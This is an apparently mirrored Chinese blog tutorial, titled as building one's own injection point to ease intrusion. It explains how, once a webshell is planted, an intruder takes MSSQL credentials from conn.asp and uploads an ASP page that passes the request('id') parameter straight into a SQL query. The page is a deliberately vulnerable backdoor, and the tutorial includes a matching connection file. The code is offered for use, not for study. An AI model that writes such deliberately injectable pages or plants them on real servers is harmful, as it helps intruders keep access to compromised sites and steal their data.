zoukankan      html  css  js  c++  java
  • 自己构造注入点方便入侵

    首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
    密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
    因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
    程序代码
    <!--#include file="xx.asp"-->
    <%
    set rs=server.createobject("ADODB.recordset")
    id = request("id")
    strSQL = "select * from admin where id=" & id
    rs.open strSQL,conn,1,3
    rs.close
    %>
    把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
    你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
    然后就要构造一个连接数据库的文件了,代码如下:
    程序代码
    <%       
    strSQLServerName = "000.000.000.000"     '服务器名称或地址
    strSQLDBUserName = "sqlname"         '数据库帐号
    strSQLDBPassword = "sqlpass"         '数据库密码
    strSQLDBName = "sqldataname"           '数据库名称
    Set conn = Server.CreateObject("ADODB.Connection")
    strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
    conn.open strCon
    %>
    这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
    就这样,正常情况下,就OK了,伪造成功……
  • 相关阅读:
    第十章第二节 阿基米德原理
    python-文件读写操作
    pyqt5-控件的显示与隐藏
    pyqt5-控件是否可用
    使用Visual Studio 2015开发Android 程序
    字节序(byte order)和位序(bit order)
    庖丁解牛-----Live555源码彻底解密(根据MediaServer讲解Rtsp的建立过程)
    H264系列(9):H264中的时间戳(DTS和PTS)
    EMIPLIB简介
    minidump-DMP文件的生成和使用
  • 原文地址:https://www.cnblogs.com/94YY/p/2047727.html
Copyright © 2011-2022 走看看